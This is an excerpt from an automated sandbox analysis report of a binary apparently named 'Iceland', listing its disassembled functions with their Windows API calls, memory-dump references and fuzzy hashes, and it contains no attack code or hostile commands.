API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 0262c4d1524f627605e1a827535967d0db951a8e3a31ea226de533e29782f9a2
Instruction ID: 01d90e72e9bd4d14b9efd0cfa6805b7dfee24521b290251e490cdb924984b180
Opcode Fuzzy Hash: 0262c4d1524f627605e1a827535967d0db951a8e3a31ea226de533e29782f9a2
Instruction Fuzzy Hash: 4431C670518387DEEB38EB34D988BB637ACAF01304F04456AE463C72A1E7A89845DF21

Function 0097224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00972262
PostMessageW.USER32(00000001,00000201,00000001), ref: 0097230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00972316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00972327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 0097232F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7124479e9650bfa89b56af74baa82765bc11be138301f0113b286cdc742d9479
Instruction ID: 3bce6892d8751edbb354d9e74bae4fc2ed764d0cbceb20072b41dbb420866bba
Opcode Fuzzy Hash: 7124479e9650bfa89b56af74baa82765bc11be138301f0113b286cdc742d9479
Instruction Fuzzy Hash: 9D31E272910219EFDB14CFA8CD88ADE3BB5EF05315F108225F926AB2D1C770D940DB90

Function 0098D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0098CC63,00000000), ref: 0098D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 0098D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,0098CC63,00000000), ref: 0098D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,0098CC63,00000000), ref: 0098DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,0098CC63,00000000), ref: 0098DA37

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 23651500556b79df10f27801866832fee95dc344d4bb49612bfca68a8746c00c
Instruction ID: baa727402c1e9ee05018519bb709591c4cad960c7efacb41e89383101f1090a6
Opcode Fuzzy Hash: 23651500556b79df10f27801866832fee95dc344d4bb49612bfca68a8746c00c
Instruction Fuzzy Hash: 3D314971506205EFDB24EFA6D884AAABBFCEF45354B20442EE546D2290DB31EE41DB60

Function 009A61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 009A61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 009A623C
_wcslen.LIBCMT ref: 009A624E
_wcslen.LIBCMT ref: 009A6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 009A62B5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 29be10291707923ae755e838ca2103c30ca81566f392d93412621315cbe1a2de
Instruction ID: a36d33d6db9d8b1805670efb43d23967dd8937241589d67594edbca6495d18a7
Opcode Fuzzy Hash: 29be10291707923ae755e838ca2103c30ca81566f392d93412621315cbe1a2de
Instruction Fuzzy Hash: 272182719042189ADF219FA4CC84BEE7BBCFF46324F144616F925EA180DB749985DF90

Function 0099138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009913AE
GetForegroundWindow.USER32 ref: 009913C5
GetDC.USER32(00000000), ref: 00991401
GetPixel.GDI32(00000000,?,00000003), ref: 0099140D
ReleaseDC.USER32(00000000,00000003), ref: 00991445

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f067e4be0e33190944ef45ce233597f0054c35b0937ce38e93f6db5f47e8d5b6
Instruction ID: bbd7c19890e44fb94d48db3269cf36fdb9c7ab041f082a0d3191acdb5a1ba8ca
Opcode Fuzzy Hash: f067e4be0e33190944ef45ce233597f0054c35b0937ce38e93f6db5f47e8d5b6
Instruction Fuzzy Hash: BA219076605218AFDB04EF69C885AAEB7F5FF89340B048429F85AD7751CA30AD40DB90

Function 0094D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0094D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094D169

Part of subcall function 00943B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00936A79,?,0000015D,?,?,?,?,009385B0,000000FF,00000000,?,?), ref: 00943BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0094D18F
_free.LIBCMT ref: 0094D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0094D1B1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 321323347761d27a5d9bc781abbea1701637ae3290008708f85275dbc56ef114
Instruction ID: 8724c948e5a6ebaa770c7103bfb5d8353df363e1dccda40f604ca1a7e2fbaf23
Opcode Fuzzy Hash: 321323347761d27a5d9bc781abbea1701637ae3290008708f85275dbc56ef114
Instruction Fuzzy Hash: D701F77A60F6157F372526765C8CD7F7A6DDECBB61314022AFC05C6240EE608C0191F0

Function 00976078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0097608D
_memcmp.LIBVCRUNTIME ref: 009760AB
_memcmp.LIBVCRUNTIME ref: 009760BE
_memcmp.LIBVCRUNTIME ref: 009760D6
_memcmp.LIBVCRUNTIME ref: 009760EE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fceea26d250fe4adfd5543f34ede5edc28d2979885aaeefbbd5644932f166a3b
Instruction ID: a58c04e96de7249ff891aa47edd650b6f4d005f4c553ec133c5244c95f6a84b8
Opcode Fuzzy Hash: fceea26d250fe4adfd5543f34ede5edc28d2979885aaeefbbd5644932f166a3b
Instruction Fuzzy Hash: 270124F3600B157BDB1466228D82FEB731D9ED13ACF088420FD0E9B251E721ED10C6A0

Function 0094316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,0093F64E,0093545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00943170
_free.LIBCMT ref: 009431A5
_free.LIBCMT ref: 009431CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009431D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009431E2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b4d924e570035726742749fcd108718b6289c0f6f92af253cd0d847c0a8286cc
Instruction ID: 7a1ae00ae60f50fc2f16be06af7a464e809cd386f7b12018a026eb4ccf2a0005
Opcode Fuzzy Hash: b4d924e570035726742749fcd108718b6289c0f6f92af253cd0d847c0a8286cc
Instruction Fuzzy Hash: E20128726AE6002B961277349C86F2B266DEFC93757208525F826D21C1EF35CE015260

Function 009708FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?,?,00970C4E), ref: 0097091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?), ref: 00970936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?), ref: 00970944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?), ref: 00970954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?), ref: 00970960

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e6e6981ad3ae284711e68e16b69ac259846ff56447279c2b5a46c5599a0eb881
Instruction ID: ffc544f9e08ac91c8a93d41dd24132da9cec7ec7d804f8e1c5204ead305708e2
Opcode Fuzzy Hash: e6e6981ad3ae284711e68e16b69ac259846ff56447279c2b5a46c5599a0eb881
Instruction Fuzzy Hash: 3101A2B3615208FFEB104F59DC44B9A7BBDEF84791F148124FA0AE2211D775DD40ABA0

Function 0097F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0097F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 0097F2BC
Sleep.KERNEL32(00000000), ref: 0097F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 0097F2CE
Sleep.KERNEL32 ref: 0097F30A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 5e760f0c771dea7f8fe053fa8ea354e195684a417bf32a4f6d605478ff54d47b
Instruction ID: fa2f003544396c6a21e8964c4655999e614fff07fc6ef57bc74fafb59904f11c
Opcode Fuzzy Hash: 5e760f0c771dea7f8fe053fa8ea354e195684a417bf32a4f6d605478ff54d47b
Instruction Fuzzy Hash: A601CC32C0A61DDBCF00AFB4EC59AEEBB79FF09300F004426E912B2290CB309554DBA1

Function 00971A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00971A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00971A99

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ee20772d202982111da7f48bb634197d76ffa94e598f34b2bc7c5c5290992391
Instruction ID: c1a4a71098cf0fae612352e0ae17bd5bfa4bebd84c46a4db1239b6ca0b73fbba
Opcode Fuzzy Hash: ee20772d202982111da7f48bb634197d76ffa94e598f34b2bc7c5c5290992391
Instruction Fuzzy Hash: 2B01A4B5616305BFDB154F68DC49D6B3B7DEF89364F214414F846C3260DA31DC40DAA0

Function 00971900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00971916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00971922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00971931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00971938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0097194E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 81fceb205ae6eff4a53089bd9905b21c89f349951b6fbcb20f44feba24a42390
Instruction ID: 6376fc34337de2ac8cab0bf8023b93a30ed8d18af906d2a8ce8d314b9dba04d9
Opcode Fuzzy Hash: 81fceb205ae6eff4a53089bd9905b21c89f349951b6fbcb20f44feba24a42390
Instruction Fuzzy Hash: B2F06276215312ABDB210F69EC4DF563B6DEF8A7A0F114414FA4AD7290DB70DC019AA0

Function 00971960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00971976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00971982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00971991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00971998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009719AE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 803a3bb6484008c6da0666851d4cf638ec7f2abc48862d9888f3e64ef61e6891
Instruction ID: 449a16a1b7e2c57b5748cc09e6a417631d35374bee52fe615be514b4ff03b0ec
Opcode Fuzzy Hash: 803a3bb6484008c6da0666851d4cf638ec7f2abc48862d9888f3e64ef61e6891
Instruction Fuzzy Hash: EAF09676215311BBDB214F68EC59F573B6DEF8A7A0F114414FE4AC7250DA70DC41DAA0

Function 00980CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00980B24,?,00983D41,?,00000001,00953AF4,?), ref: 00980CCB
CloseHandle.KERNEL32(?,?,?,?,00980B24,?,00983D41,?,00000001,00953AF4,?), ref: 00980CD8
CloseHandle.KERNEL32(?,?,?,?,00980B24,?,00983D41,?,00000001,00953AF4,?), ref: 00980CE5
CloseHandle.KERNEL32(?,?,?,?,00980B24,?,00983D41,?,00000001,00953AF4,?), ref: 00980CF2
CloseHandle.KERNEL32(?,?,?,?,00980B24,?,00983D41,?,00000001,00953AF4,?), ref: 00980CFF
CloseHandle.KERNEL32(?,?,?,?,00980B24,?,00983D41,?,00000001,00953AF4,?), ref: 00980D0C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bcaeeace57e61dc4de2e3f9e5fe39f01979fbd99651848fb80fb3655c3dab73f
Instruction ID: ee14d047ddcd46325b4aac284886861b80bdb7dec383172401008b2d16e9a6e2
Opcode Fuzzy Hash: bcaeeace57e61dc4de2e3f9e5fe39f01979fbd99651848fb80fb3655c3dab73f
Instruction Fuzzy Hash: 5601AE72801B15DFCB30AFA6D980816FBF9BF903153158A3ED19752A31C7B0A958DF80

Function 009765AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009765BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 009765D6
MessageBeep.USER32(00000000), ref: 009765EE
KillTimer.USER32(?,0000040A), ref: 0097660A
EndDialog.USER32(?,00000001), ref: 00976624

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 47db7a4d27c362fc71d834c3ef62864a836030d93ba5d219c0acab8a9397ee7e
Instruction ID: 488cebbbbeb2c06bde1b066d53668025895a70eaa7909696baafda544623ff87
Opcode Fuzzy Hash: 47db7a4d27c362fc71d834c3ef62864a836030d93ba5d219c0acab8a9397ee7e
Instruction Fuzzy Hash: 5B018131515704ABEB245F20DD4EBDA7BB8FF01705F404659B18BA28E1EBF4AA84DA90

Function 0094DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0094DAD2

Part of subcall function 00942D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4), ref: 00942D4E
Part of subcall function 00942D38: GetLastError.KERNEL32(009E1DC4,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4,009E1DC4), ref: 00942D60

_free.LIBCMT ref: 0094DAE4
_free.LIBCMT ref: 0094DAF6
_free.LIBCMT ref: 0094DB08
_free.LIBCMT ref: 0094DB1A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 47d90d8e7c2aa18efcd57893b08af7f4c1cff6b13a03ffe48ad06127588b7848
Instruction ID: 671cfb7f4fc511e1ee4695a1b98dd89268da15dd19d6246b322ff85584d9ad86
Opcode Fuzzy Hash: 47d90d8e7c2aa18efcd57893b08af7f4c1cff6b13a03ffe48ad06127588b7848
Instruction Fuzzy Hash: 2DF0303299B604ABC625EB68F986E1A77EDFE457107E50C1AF009D7541CB30FCC09B64

Function 00942610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0094262E

Part of subcall function 00942D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4), ref: 00942D4E
Part of subcall function 00942D38: GetLastError.KERNEL32(009E1DC4,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4,009E1DC4), ref: 00942D60

_free.LIBCMT ref: 00942640
_free.LIBCMT ref: 00942653
_free.LIBCMT ref: 00942664
_free.LIBCMT ref: 00942675

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dec21e3b457cb8df433f28f4a191decb4927f4e5f2a0ff0888b1ad92239b61aa
Instruction ID: 557be0a40dbf13c1429facd077574f8fcf09ee7aebf9a8956e3a0911663d5d37
Opcode Fuzzy Hash: dec21e3b457cb8df433f28f4a191decb4927f4e5f2a0ff0888b1ad92239b61aa
Instruction Fuzzy Hash: 33F0DA708AA2A09BCA16AF54EC81D483BA8FB68761395091BF4249E3B5C7310D41BFC4

